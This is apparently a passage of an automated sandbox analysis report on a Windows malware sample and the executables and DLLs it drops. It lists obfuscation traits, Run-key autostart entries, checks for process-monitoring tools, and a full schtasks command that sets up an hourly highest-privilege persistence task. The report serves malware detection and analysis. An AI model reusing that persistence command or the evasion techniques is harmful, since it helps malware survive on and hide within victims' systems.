Source: clip64.dll.16.dr Static PE information: real checksum: 0x0 should be: 0x2272f
Source: chrosha.exe.12.dr Static PE information: real checksum: 0x1dc6c6 should be: 0x1dbe20
Source: explorha.exe.0.dr Static PE information: real checksum: 0x2f5a1c should be: 0x2f7366
Source: clip64.dll.6.dr Static PE information: real checksum: 0x0 should be: 0x1f783
Source: cred64[1].dll.16.dr Static PE information: real checksum: 0x0 should be: 0x14356f
Source: amert[1].exe.6.dr Static PE information: real checksum: 0x1dc6c6 should be: 0x1dbe20
Source: clip64[1].dll.6.dr Static PE information: real checksum: 0x0 should be: 0x1f783
Source: cred64.dll.16.dr Static PE information: real checksum: 0x0 should be: 0x14356f
Source: cred64.dll.6.dr Static PE information: real checksum: 0x0 should be: 0x147ee8
PE file contains sections with non-standard names
Source: UeW2b6mU6Z.exe Static PE information: section name:
Source: UeW2b6mU6Z.exe Static PE information: section name: .idata
Source: UeW2b6mU6Z.exe Static PE information: section name: ldcfgzdi
Source: UeW2b6mU6Z.exe Static PE information: section name: thopgwrw
Source: UeW2b6mU6Z.exe Static PE information: section name: .taggant
Source: explorha.exe.0.dr Static PE information: section name:
Source: explorha.exe.0.dr Static PE information: section name: .idata
Source: explorha.exe.0.dr Static PE information: section name: ldcfgzdi
Source: explorha.exe.0.dr Static PE information: section name: thopgwrw
Source: explorha.exe.0.dr Static PE information: section name: .taggant
Source: cred64[1].dll.6.dr Static PE information: section name: _RDATA
Source: cred64.dll.6.dr Static PE information: section name: _RDATA
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert[1].exe.6.dr Static PE information: section name: .idata
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert[1].exe.6.dr Static PE information: section name: mxcnarui
Source: amert[1].exe.6.dr Static PE information: section name: nxgghrcb
Source: amert[1].exe.6.dr Static PE information: section name: .taggant
Source: amert.exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name: .idata
Source: amert.exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name: mxcnarui
Source: amert.exe.6.dr Static PE information: section name: nxgghrcb
Source: amert.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: kiragzej
Source: random[1].exe0.6.dr Static PE information: section name: cquspnza
Source: 590971cd60.exe.6.dr Static PE information: section name:
Source: 590971cd60.exe.6.dr Static PE information: section name: .idata
Source: 590971cd60.exe.6.dr Static PE information: section name:
Source: 590971cd60.exe.6.dr Static PE information: section name: kiragzej
Source: 590971cd60.exe.6.dr Static PE information: section name: cquspnza
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name: .idata
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name: dspczsrr
Source: sarra[1].exe.6.dr Static PE information: section name: bhvulryj
Source: chrosha.exe.12.dr Static PE information: section name:
Source: chrosha.exe.12.dr Static PE information: section name: .idata
Source: chrosha.exe.12.dr Static PE information: section name:
Source: chrosha.exe.12.dr Static PE information: section name: mxcnarui
Source: chrosha.exe.12.dr Static PE information: section name: nxgghrcb
Source: chrosha.exe.12.dr Static PE information: section name: .taggant
Source: cred64[1].dll.16.dr Static PE information: section name: _RDATA
Source: cred64.dll.16.dr Static PE information: section name: _RDATA
Source: RageMP131.exe.20.dr Static PE information: section name:
Source: RageMP131.exe.20.dr Static PE information: section name: .idata
Source: RageMP131.exe.20.dr Static PE information: section name:
Source: RageMP131.exe.20.dr Static PE information: section name: kiragzej
Source: RageMP131.exe.20.dr Static PE information: section name: cquspnza
Source: MPGPH131.exe.20.dr Static PE information: section name:
Source: MPGPH131.exe.20.dr Static PE information: section name: .idata
Source: MPGPH131.exe.20.dr Static PE information: section name:
Source: MPGPH131.exe.20.dr Static PE information: section name: kiragzej
Source: MPGPH131.exe.20.dr Static PE information: section name: cquspnza
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C529A0 push esp; ret 0_2_00C529A1
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C49420 push ebx; ret 0_2_00C4942A
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C48DE6 push esi; iretd 0_2_00C48DE7
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C5EFBC push ecx; ret 0_2_00C5EFCF
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00ADC0E8 push cs; retn 0002h 1_2_00ADC0E9
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00AD9420 push ebx; ret 1_2_00AD942A
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00AD8DE6 push esi; iretd 1_2_00AD8DE7
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00AEEFBC push ecx; ret 1_2_00AEEFCF
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00ADC0E8 push cs; retn 0002h 2_2_00ADC0E9
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00AD9420 push ebx; ret 2_2_00AD942A
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00AD8DE6 push esi; iretd 2_2_00AD8DE7
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00AEEFBC push ecx; ret 2_2_00AEEFCF
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00AEEFBC push ecx; ret 6_2_00AEEFCF
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B0F4FB push ss; iretd 6_2_00B0F4FC
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00AEF666 push ecx; ret 6_2_00AEF679
Source: UeW2b6mU6Z.exe Static PE information: section name: entropy: 7.980021515405835
Source: explorha.exe.0.dr Static PE information: section name: entropy: 7.980021515405835
Source: amert[1].exe.6.dr Static PE information: section name: entropy: 7.988756925012516
Source: amert[1].exe.6.dr Static PE information: section name: mxcnarui entropy: 7.954740123468286
Source: amert.exe.6.dr Static PE information: section name: entropy: 7.988756925012516
Source: amert.exe.6.dr Static PE information: section name: mxcnarui entropy: 7.954740123468286
Source: random[1].exe0.6.dr Static PE information: section name: entropy: 7.9277038793201395
Source: random[1].exe0.6.dr Static PE information: section name: kiragzej entropy: 7.949158381661359
Source: 590971cd60.exe.6.dr Static PE information: section name: entropy: 7.9277038793201395
Source: 590971cd60.exe.6.dr Static PE information: section name: kiragzej entropy: 7.949158381661359
Source: sarra[1].exe.6.dr Static PE information: section name: entropy: 7.927724377474478
Source: sarra[1].exe.6.dr Static PE information: section name: dspczsrr entropy: 7.949274848387835
Source: chrosha.exe.12.dr Static PE information: section name: entropy: 7.988756925012516
Source: chrosha.exe.12.dr Static PE information: section name: mxcnarui entropy: 7.954740123468286
Source: RageMP131.exe.20.dr Static PE information: section name: entropy: 7.9277038793201395
Source: RageMP131.exe.20.dr Static PE information: section name: kiragzej entropy: 7.949158381661359
Source: MPGPH131.exe.20.dr Static PE information: section name: entropy: 7.9277038793201395
Source: MPGPH131.exe.20.dr Static PE information: section name: kiragzej entropy: 7.949158381661359
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cred64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\amert[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe Jump to dropped file
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe File created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[2].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe File created: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\sarra[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cred64[1].dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bad48ea9ac.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 590971cd60.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window searched: window name: Regmonclass
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Creates job files (autostart)
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe File created: C:\Windows\Tasks\explorha.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bad48ea9ac.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bad48ea9ac.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 590971cd60.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 590971cd60.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
